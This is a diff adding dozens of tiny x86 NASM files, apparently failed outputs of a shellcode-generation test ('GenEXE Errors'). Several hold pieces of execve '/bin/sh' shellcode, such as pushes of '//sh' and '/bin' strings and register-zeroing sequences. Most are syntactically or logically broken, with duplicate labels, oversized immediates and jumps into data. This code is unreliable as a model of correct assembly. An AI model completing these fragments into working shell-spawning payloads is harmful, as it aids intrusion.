+my_start: + + test eax, eax + jns _while_loop + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.obj new file mode 100644 index 0000000000000000000000000000000000000000..a7f19899ab9b7a45625b5bac1330eb2809771e66 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_452.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.asm new file mode 100644 index 0000000000000000000000000000000000000000..8cc48608049c7d4ad99ab7dcb0bacfcaaaa0f6c1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.asm @@ -0,0 +1,13 @@ +section .data + +_encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jz _encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.obj new file mode 100644 index 0000000000000000000000000000000000000000..8268f861c58a98686293bb50ebce0eff99a26648 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_455.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.asm new file mode 100644 index 0000000000000000000000000000000000000000..018654c8f39fe2b2f6cb944e2bbccfe68b4b08a6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.obj new file mode 100644 index 0000000000000000000000000000000000000000..e3fe5e215396318f1885a7a4a785de5b38ba2731 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_457.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.asm new file mode 100644 index 0000000000000000000000000000000000000000..e055f98132e57f770d94380a2c1a0ede6b64912c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ecx, ecx + mul ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.obj new file mode 100644 index 0000000000000000000000000000000000000000..c46b073af4ba644d7f98d01fa97381b840bcfbcb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_458.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.asm new file mode 100644 index 0000000000000000000000000000000000000000..f9cad09263a08d9a7b77ace3e7e63aa8cd8a2a81 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _next_addr: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.obj new file mode 100644 index 0000000000000000000000000000000000000000..ea14f7a380d7b8d599ccf11585f1f7d5d91e2819 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_46.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.asm new file mode 100644 index 0000000000000000000000000000000000000000..9e5f74fae2782deb4e82ba1abbefa5d42057e502 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.asm @@ -0,0 +1,14 @@ +section .data + +_start equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp al, 0xf2 + jge _start + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.obj new file mode 100644 index 0000000000000000000000000000000000000000..80e73487e9e6ae1639456ad9793548767d94cfc9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_461.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.asm new file mode 100644 index 0000000000000000000000000000000000000000..bfb77004188045e9390187e3c64cef0036cfe603 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0x11 + jl 0xff + add dl, 0x5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.obj new file mode 100644 index 0000000000000000000000000000000000000000..5d684ab318117b8448609b53cc4b3cf112f6da34 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_467.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.asm new file mode 100644 index 0000000000000000000000000000000000000000..fec40163a8612f9baa14e78bab90bb98f4dd27e1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov [esi+1], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.obj new file mode 100644 index 0000000000000000000000000000000000000000..9b093b1f01a9904b7f5fb6a1246c891feadb3470 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_473.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.asm new file mode 100644 index 0000000000000000000000000000000000000000..1c0a923bc76f2ab11e53ab9f94fe5fec0d33e2fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.obj new file mode 100644 index 0000000000000000000000000000000000000000..c9ad8e22405b08161076188ae2e6886f908095cc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_476.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.asm new file mode 100644 index 0000000000000000000000000000000000000000..7433fd38bd067817b82437149a0004f8a2f454fe --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [eax], 15 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.obj new file mode 100644 index 0000000000000000000000000000000000000000..bdc58b726bac1174979c121d7a54c64d7932b60c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_477.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.obj new file mode 100644 index 0000000000000000000000000000000000000000..6f19b796939bab0104dbb281aa4cdfe76d0007a7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_478.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.obj new file mode 100644 index 0000000000000000000000000000000000000000..0ade4965b27892aab90ba96e59354a4c7e6bddd7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_480.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.asm new file mode 100644 index 0000000000000000000000000000000000000000..35f563a889c582f52224692c5db4efe864eee875 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.asm @@ -0,0 +1,20 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.obj new file mode 100644 index 0000000000000000000000000000000000000000..b291f9e4d18ada975ed0191376ade92a8e469c05 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_484.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.asm new file mode 100644 index 0000000000000000000000000000000000000000..ab5e11b5fa8d965c7c5d6289ac80ae41c64b8d68 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov dword [0x732f636f], 0x732f636f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.obj new file mode 100644 index 0000000000000000000000000000000000000000..f02ddc5a248cd17dc17df54f3326d91d746cffe3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_485.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.asm new file mode 100644 index 0000000000000000000000000000000000000000..2bcff645aa7f02415ecc1b75c50ea13284484130 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp ebx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.obj new file mode 100644 index 0000000000000000000000000000000000000000..3673a03272edc7d9d8bbef2586ee46d5755c8466 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_490.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.asm new file mode 100644 index 0000000000000000000000000000000000000000..7430eac8a9fb96a0fde245216f9606ef56dc2ee6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .data, _start + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.obj new file mode 100644 index 0000000000000000000000000000000000000000..46b201b1668a5768df3e0bd7f080fbf170bca343 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_491.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.asm new file mode 100644 index 0000000000000000000000000000000000000000..d59f24c1b07f4853742ba5f54a2b6d2246995e79 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + dec dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.obj new file mode 100644 index 0000000000000000000000000000000000000000..eac9085329c5960ddb91b29930259a89c6327461 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_492.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_493.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_493.asm new file mode 100644 index 0000000000000000000000000000000000000000..ed7b92a7e15421f0617fd2c5adac27276c95784c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_493.asm @@ -0,0 +1,95 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero6e69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero6e69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.asm new file mode 100644 index 0000000000000000000000000000000000000000..968db68df721f5b7b3daef8680613a3a36ccc266 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x68732f2f + mov eax, 0x6e69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.obj new file mode 100644 index 0000000000000000000000000000000000000000..7d45a29b0154726842ec28d3381bfdfc884c547a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_494.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.asm new file mode 100644 index 0000000000000000000000000000000000000000..2f95b62042f2e05f13621723146616918a8ed78a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x68732f2f + mov al, 0x6e69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.obj new file mode 100644 index 0000000000000000000000000000000000000000..b63abe6369b28ebf54f2e1d279ce1e45ab28b1ea Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_498.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.asm new file mode 100644 index 0000000000000000000000000000000000000000..d3ade439993098e155d4b216fb20f148faad1759 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.obj new file mode 100644 index 0000000000000000000000000000000000000000..662eea0c4c9da4abf15ed9c9ecfa832889840792 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_500.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.asm new file mode 100644 index 0000000000000000000000000000000000000000..bb7c15c2b6f62576b2a9899aa42458b81247a4da --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + not eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.obj new file mode 100644 index 0000000000000000000000000000000000000000..34fa96f032fcde374b5b39810e67ffd3182d0971 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_508.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.asm new file mode 100644 index 0000000000000000000000000000000000000000..c4f46a9f9ae07e2bbfda8ce90130ee1fc79def76 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + add ax, 1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.obj new file mode 100644 index 0000000000000000000000000000000000000000..05f1f279b114797d8b098a24b49e38ed677000fb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_51.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.obj new file mode 100644 index 0000000000000000000000000000000000000000..d5ca426c335aefb0b5d81dd9a36b58be456f84e5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_511.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.asm new file mode 100644 index 0000000000000000000000000000000000000000..1df1303d3735eb4982d8a36972f81d7e78745910 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.asm @@ -0,0 +1,20 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f2f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.obj new file mode 100644 index 0000000000000000000000000000000000000000..2ca58a8a3b059efde682acf10adafbf1972aa46d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_513.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_518.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_518.asm new file mode 100644 index 0000000000000000000000000000000000000000..ed7b92a7e15421f0617fd2c5adac27276c95784c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_518.asm @@ -0,0 +1,95 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero68732f + jmp zero6e69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp zero69622f + jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero68732f: + +inc eax + +jmp myExitAddr +zero6e69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr +zero69622f: + +inc eax + +jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.asm new file mode 100644 index 0000000000000000000000000000000000000000..f6c2fedf34d6e8ffa5238b3103ab42ceffc7714c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.asm @@ -0,0 +1,13 @@ +section .data + +write equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jge write + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.obj new file mode 100644 index 0000000000000000000000000000000000000000..e4bda0b7c9111bf96b04d790962de861084d9509 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_519.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.asm new file mode 100644 index 0000000000000000000000000000000000000000..9107b7234dade6cb8137c4ffe9febf563e684da0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.asm @@ -0,0 +1,25 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.obj new file mode 100644 index 